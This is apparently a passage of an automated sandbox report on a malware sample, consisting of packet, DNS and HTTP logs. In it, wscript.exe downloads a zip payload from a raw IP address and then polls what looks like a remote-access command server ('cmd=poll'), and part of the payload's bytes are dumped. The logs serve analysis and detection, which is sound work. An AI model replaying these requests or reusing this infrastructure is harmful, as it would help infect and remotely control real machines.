Jan 14, 2025 16:21:10.628587008 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:10.628627062 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:10.628690958 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:10.628703117 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:10.628712893 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:10.628722906 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:10.628734112 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:10.628741026 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:10.628777027 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:10.628777027 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:10.628887892 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:10.628900051 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:10.628910065 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:10.628921032 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:10.628931046 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:10.628943920 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:10.628954887 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:10.629019022 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:10.629031897 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:10.629040003 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:10.629075050 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:10.629168987 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:10.629179955 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:10.629384041 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:10.686326981 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:10.686352015 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:10.686363935 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:10.686376095 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:10.686404943 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:10.686417103 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:10.686492920 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:10.686506987 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:10.686517954 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:10.686526060 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:10.686530113 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:10.686526060 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:10.686600924 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:10.686600924 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:10.686600924 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:10.686609983 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:10.686623096 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:10.686635017 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:10.686645985 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:10.686650038 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:10.686661005 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:10.686680079 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:10.686827898 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:10.686840057 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:10.686849117 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:10.686851025 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:10.686861992 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:10.686877012 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:10.686877966 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:10.686888933 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:10.686904907 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:10.686928034 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:10.686939955 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:10.686953068 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:10.686964989 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:10.686975956 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:10.686980963 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:10.686988115 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:10.687000036 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:10.687006950 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:10.687043905 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:10.687043905 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:10.687175035 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:10.687186956 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:10.687196970 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:10.687200069 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:10.687208891 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:10.687211990 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:10.687223911 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:10.687232971 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:10.687235117 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:10.687247038 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:10.687258005 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:10.687263012 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:10.687302113 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:10.687302113 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:10.687414885 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:10.687427044 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:10.687427998 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:10.687427998 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:10.687438965 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:10.687449932 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:10.687449932 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:10.687460899 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:10.687472105 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:10.687472105 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:10.687484026 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:10.687494993 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:10.687501907 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:10.687505960 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:10.687525034 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:10.687587976 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:10.687587976 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:10.687628984 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:10.687640905 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:10.687653065 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:10.687665939 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:10.687675953 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:10.687697887 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:10.687730074 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:10.687743902 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:10.687753916 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:10.687764883 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:10.687851906 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:10.687865973 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:10.687874079 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:10.687876940 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:10.687889099 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:10.687895060 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:10.687922001 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:10.688024044 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:10.688029051 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:10.688041925 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:10.688052893 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:10.688065052 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:10.688076019 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:10.688081980 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:10.688086987 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:10.688107967 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:10.688301086 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:10.688313007 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:10.688322067 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:10.688324928 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:10.688335896 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:10.688344002 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:10.688347101 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:10.688359976 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:10.688370943 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:10.688376904 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:10.688381910 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:10.688404083 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:10.688442945 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:10.688462973 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:10.688467979 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:10.688474894 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:10.688486099 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:10.688486099 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:10.688498020 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:10.688525915 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:10.688525915 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:10.688549995 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:10.688605070 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:10.688623905 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:10.688626051 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:10.688635111 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:10.688647032 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:10.688652992 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:10.688657999 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:10.688667059 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:10.688669920 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:10.688699007 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:10.688725948 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:10.688739061 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:10.688746929 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:10.688762903 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:10.688802004 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:10.688802004 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:10.715821981 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:10.715838909 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:10.715851068 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:10.715862036 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:10.715873957 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:10.715884924 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:10.715923071 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:10.715956926 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:10.715984106 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:10.716097116 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:10.716110945 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:10.716120958 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:10.716131926 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:10.716142893 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:10.716152906 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:10.716164112 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:10.716175079 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:10.716166973 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:10.716185093 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:10.716166973 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:10.716208935 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:10.716228008 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:10.716242075 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:10.716315985 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:10.716315985 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:10.716315985 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:10.716351986 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:10.716366053 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:10.716425896 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:10.716425896 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:10.716495037 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:10.716494083 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:10.716506958 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:10.716516972 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:10.716525078 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:10.716527939 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:10.716557980 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:10.716602087 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:10.716675997 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:10.716687918 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:10.716870070 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:15.572024107 CET	49166	443	192.168.2.22	185.157.213.71
Jan 14, 2025 16:21:15.572061062 CET	443	49166	185.157.213.71	192.168.2.22
Jan 14, 2025 16:21:15.572118998 CET	49166	443	192.168.2.22	185.157.213.71
Jan 14, 2025 16:21:17.443648100 CET	49166	443	192.168.2.22	185.157.213.71
Jan 14, 2025 16:21:17.443674088 CET	443	49166	185.157.213.71	192.168.2.22
Jan 14, 2025 16:21:17.443759918 CET	443	49166	185.157.213.71	192.168.2.22
Jan 14, 2025 16:21:17.960445881 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:18.463690042 CET	49167	80	192.168.2.22	104.26.0.231
Jan 14, 2025 16:21:18.468815088 CET	80	49167	104.26.0.231	192.168.2.22
Jan 14, 2025 16:21:18.468882084 CET	49167	80	192.168.2.22	104.26.0.231
Jan 14, 2025 16:21:18.469197035 CET	49167	80	192.168.2.22	104.26.0.231
Jan 14, 2025 16:21:18.474044085 CET	80	49167	104.26.0.231	192.168.2.22
Jan 14, 2025 16:21:19.191450119 CET	80	49167	104.26.0.231	192.168.2.22
Jan 14, 2025 16:21:19.191616058 CET	49167	80	192.168.2.22	104.26.0.231
Jan 14, 2025 16:21:19.518095016 CET	49167	80	192.168.2.22	104.26.0.231
Jan 14, 2025 16:21:19.518235922 CET	49167	80	192.168.2.22	104.26.0.231
Jan 14, 2025 16:21:19.576423883 CET	49168	80	192.168.2.22	104.26.0.231
Jan 14, 2025 16:21:19.581438065 CET	80	49168	104.26.0.231	192.168.2.22
Jan 14, 2025 16:21:19.581598997 CET	49168	80	192.168.2.22	104.26.0.231
Jan 14, 2025 16:21:19.581892967 CET	49168	80	192.168.2.22	104.26.0.231
Jan 14, 2025 16:21:19.586620092 CET	80	49168	104.26.0.231	192.168.2.22
Jan 14, 2025 16:21:20.263068914 CET	80	49168	104.26.0.231	192.168.2.22
Jan 14, 2025 16:21:20.263333082 CET	49168	80	192.168.2.22	104.26.0.231
Jan 14, 2025 16:21:20.263608932 CET	49168	80	192.168.2.22	104.26.0.231
Jan 14, 2025 16:21:20.264259100 CET	49169	80	192.168.2.22	104.26.0.231
Jan 14, 2025 16:21:20.268671036 CET	80	49168	104.26.0.231	192.168.2.22
Jan 14, 2025 16:21:20.268745899 CET	49168	80	192.168.2.22	104.26.0.231
Jan 14, 2025 16:21:20.269103050 CET	80	49169	104.26.0.231	192.168.2.22
Jan 14, 2025 16:21:20.269160986 CET	49169	80	192.168.2.22	104.26.0.231
Jan 14, 2025 16:21:20.269292116 CET	49169	80	192.168.2.22	104.26.0.231
Jan 14, 2025 16:21:20.274040937 CET	80	49169	104.26.0.231	192.168.2.22
Jan 14, 2025 16:21:20.958117962 CET	80	49169	104.26.0.231	192.168.2.22
Jan 14, 2025 16:21:20.958182096 CET	49169	80	192.168.2.22	104.26.0.231
Jan 14, 2025 16:21:20.958589077 CET	49169	80	192.168.2.22	104.26.0.231
Jan 14, 2025 16:21:20.958600998 CET	49169	80	192.168.2.22	104.26.0.231

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 14, 2025 16:21:18.298080921 CET	54562	53	192.168.2.22	8.8.8.8
Jan 14, 2025 16:21:18.310940981 CET	53	54562	8.8.8.8	192.168.2.22

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jan 14, 2025 16:21:18.298080921 CET	192.168.2.22	8.8.8.8	0x2022	Standard query (0)	geo.netsupportsoftware.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class	DNS over HTTPS
Jan 14, 2025 16:21:18.310940981 CET	8.8.8.8	192.168.2.22	0x2022	No error (0)	geo.netsupportsoftware.com	104.26.0.231	A (IP address)	IN (0x0001)	false
Jan 14, 2025 16:21:18.310940981 CET	8.8.8.8	192.168.2.22	0x2022	No error (0)	geo.netsupportsoftware.com	172.67.68.212	A (IP address)	IN (0x0001)	false
Jan 14, 2025 16:21:18.310940981 CET	8.8.8.8	192.168.2.22	0x2022	No error (0)	geo.netsupportsoftware.com	104.26.1.231	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

45.155.249.215

185.157.213.71connection: keep-alivecmd=pollinfo=1ack=1

geo.netsupportsoftware.com

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.22	49165	45.155.249.215	80	3364	C:\Windows\System32\wscript.exe

Timestamp	Bytes transferred	Direction	Data
Jan 14, 2025 16:21:08.003062010 CET	336	OUT	GET /xxx.zip?mt=6364 HTTP/1.1 Accept: / UA-CPU: AMD64 Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Host: 45.155.249.215 Connection: Keep-Alive
Jan 14, 2025 16:21:08.602437019 CET	1236	IN	HTTP/1.1 200 OK Server: nginx/1.24.0 (Ubuntu) Date: Tue, 14 Jan 2025 15:21:08 GMT Content-Type: application/zip Content-Length: 2845498 Connection: keep-alive Last-Modified: Mon, 13 Jan 2025 16:08:22 GMT ETag: "2b6b3a-62b98a754cee9" Accept-Ranges: bytes Data Raw: 50 4b 03 04 0a 00 00 00 00 00 44 77 2a 5a 00 00 00 00 00 00 00 00 00 00 00 00 08 00 00 00 69 6e 73 74 61 6c 6c 2f 50 4b 03 04 14 00 00 00 08 00 0b 50 29 5a 14 81 51 7e 86 b5 00 00 7c b5 00 00 19 00 00 00 69 6e 73 74 61 6c 6c 2f 35 42 38 46 45 42 32 41 46 38 31 37 34 39 33 45 73 00 05 80 fa 7f 54 44 46 24 51 72 4c 00 00 00 b5 60 88 47 af 1c 6c 35 ca ca 04 4a ee 30 0b ac fc 54 a5 52 80 93 43 4f 67 b0 e8 c6 b3 c1 a1 91 b9 e6 b0 db 7f 3a ed 1f 97 37 3c 2d 12 23 9a 03 a0 82 51 20 90 c6 b0 1d 28 dc 14 8f fa 4d 65 17 fa 2e bd 9a 1b 49 df 54 25 51 81 a0 e5 e3 c9 7d 48 92 3b c0 c1 12 bd 33 4b df 7f 70 4d ec ab 00 6a 2b 1d 0d 4a 4a ac bb 29 9d 51 7e dd e3 78 3f d4 f6 44 c4 65 d3 f9 26 7e c5 a4 cb 66 92 18 15 e3 07 28 f4 6e 21 9f 76 0e 33 83 6f 05 6a f0 f7 f1 25 7b f8 13 9d e3 c3 62 a1 d8 a2 d1 3e 0c 9d 79 11 10 09 de 7a c7 88 00 c4 9b a4 91 db a9 9b 0e 8a 99 90 7a 0d 00 de ac 45 3e 0d 8d a6 e7 f8 f0 48 4a 44 ff 41 c2 5d d2 ff 79 dc 7b 7e 86 77 78 a6 08 5e 55 f9 3c b4 77 ca 4c 83 b5 7e aa c9 6a 16 d5 5b a8 68 [TRUNCATED] Data Ascii: PKDwZinstall/PKP)ZQ~\|install/5B8FEB2AF817493EsTDF$QrL`Gl5J0TRCOg:7<-#Q (Me.IT%Q}H;3KpMj+JJ)Q~x?De&~f(n!v3oj%{b>yzzE>HJDA]y{~wx^U<wL~j[h<:,bybY`Y0FY\FJc{ne!89Zasi]NMDy;RD[m#?\ dwTP`GVqPdg 8[2^~4#^kS5{{)W2&PG1L^Y'Qt/~#~z9:;tIbgd T#?A~f%UB/g?7d$){B#E4N:mM]LDwCA7z)Rqi-j~3Ee+q2}'{"'W{]\|gKyA;x2YxiPJI];TK%bz+aQ$rMNL@S4;anOm=oCm,`oQ(&pTYp<a#xhQCN"iufA#CS43NtHcg\|t&8uxLY$)Z4AtWZz7'2m
Jan 14, 2025 16:21:08.602452993 CET	224	IN	Data Raw: b9 5a 4f 19 ce 09 29 bd f0 77 20 af cf 3a 9f 4c 90 67 70 13 f1 c0 89 e7 79 13 95 fa 36 9a d9 fa 85 f7 69 80 d9 41 53 09 95 0e 02 2d e1 56 10 37 7b 0c 4f cc 80 b8 43 85 1d 98 f7 01 20 b3 0c ba 3f 56 24 09 1f 4e 50 b0 ae eb ce fe 86 d9 09 27 f5 df Data Ascii: ZO)w :Lgpy6iAS-V7{OC ?V$NP'v){pkTVUQ?'aheZYyFq/O\.;'S:<E&U]jd%*$!LJ(:FX'X\"Ux\pqmYvouDO@)O
Jan 14, 2025 16:21:08.602464914 CET	1236	IN	Data Raw: 59 b4 49 2f b4 63 1a 8f 43 fa 1e 1f 94 19 88 7c 3f e3 12 18 65 9e b5 b4 83 94 2a 54 b8 3e b6 88 4c 43 cf 1a 91 42 1a 13 92 f6 67 22 aa 4a 12 c8 7d ff dd 95 ed 74 6b f3 0b dc 6a 26 83 97 da dc 6c 14 7f 8e a4 50 55 f9 6d 69 29 95 46 e2 a3 20 45 be Data Ascii: YI/cC\|?e*T>LCBg"J}tkj&lPUmi)F EH^Nf-("&10PwIIe"#82+Ty}0S"{HcRm=Ges% INQuF%mT.wg-v.{}2vlx6DfW`t
Jan 14, 2025 16:21:08.602525949 CET	224	IN	Data Raw: 77 e9 76 22 f6 4a 08 2b a8 4b a6 8c 34 17 5d a2 f3 9d 06 7a c9 2c 89 af b7 72 83 d0 a5 0d 81 9f c7 fc 19 66 b4 22 fa 42 66 4d 30 f4 1c fd 7f 82 92 dd ac 8b 50 ce 39 59 d3 f5 d8 b1 d7 2a 3b eb ab 35 39 b7 ac a3 ec dd 72 7b d4 88 de b7 7b 64 8a 97 Data Ascii: wv"J+K4]z,rf"BfM0P9Y;59r{{duZtR.:a5I.;=ZMB-brR~{Gf5m4GrKzWeK>klYmC7qWqrQJDd\|(
Jan 14, 2025 16:21:08.602538109 CET	1236	IN	Data Raw: 35 b2 9c 25 28 e5 f7 75 50 26 c1 af 71 24 5e 7c 0b fe b3 e3 f9 d8 f8 e8 84 1e fc 04 52 33 9d ce 3a 95 35 e7 44 b8 1f cb b5 67 c9 03 bc a8 14 c5 86 b2 24 f9 5a 70 79 b0 f2 27 88 49 2f 21 64 49 85 24 25 7e 27 4a b8 ac c9 f6 0a 61 78 ed 37 e9 fd 2f Data Ascii: 5%(uP&q$^\|R3:5Dg$Zpy'I/!dI$%~'Jax7/wuzc;7vmg^:'k>T\p8tWe"9wI^G(\!0UdDq\|HS?\|pIqGo0X^^^CFGob9QQ/$4nrR
Jan 14, 2025 16:21:08.602574110 CET	224	IN	Data Raw: 2d f5 5b 74 65 18 52 01 47 bc a4 7b 12 6c f5 e4 2d 0d 75 e8 82 ae 21 99 e0 b3 6b 7d 85 39 48 7d 40 b1 1a 20 95 be fc 37 dd e4 1f 44 f0 b2 00 8c 72 59 4a f7 7a 89 cb 70 54 2c 26 23 17 24 15 13 9e e5 56 e9 e4 b6 df d5 5c 2d 4a 95 86 b0 ed 86 49 f8 Data Ascii: -[teRG{l-u!k}9H}@ 7DrYJzpT,&#$V\-JIMtDY4FR_~.gZMF1&70aTjFz#tY{?q,_(n);%JP5z#&vMf5c i%pm
Jan 14, 2025 16:21:08.602585077 CET	1236	IN	Data Raw: 3b c4 ca a2 92 df 50 8e bb 6a 15 55 2d c0 f1 b8 08 3e d8 f0 5e 2b 67 a2 02 22 69 37 c0 6b a0 d7 ad d1 30 88 20 22 56 8e f3 54 29 ce 2e 6a b2 3a 9c 48 69 7c 18 a0 3b a5 76 3c d5 d4 c8 e3 88 e7 2d 71 7f c7 09 8f 90 21 a7 a0 08 ae c9 70 8f dc d3 dc Data Ascii: ;PjU->^+g"i7k0 "VT).j:Hi\|;v<-q!p$I{'rH']lb}D7FmSr(u&SD?OtYAu5/dKHL3bqN9,h5\orx'+(zDqi6>-aO`Hg
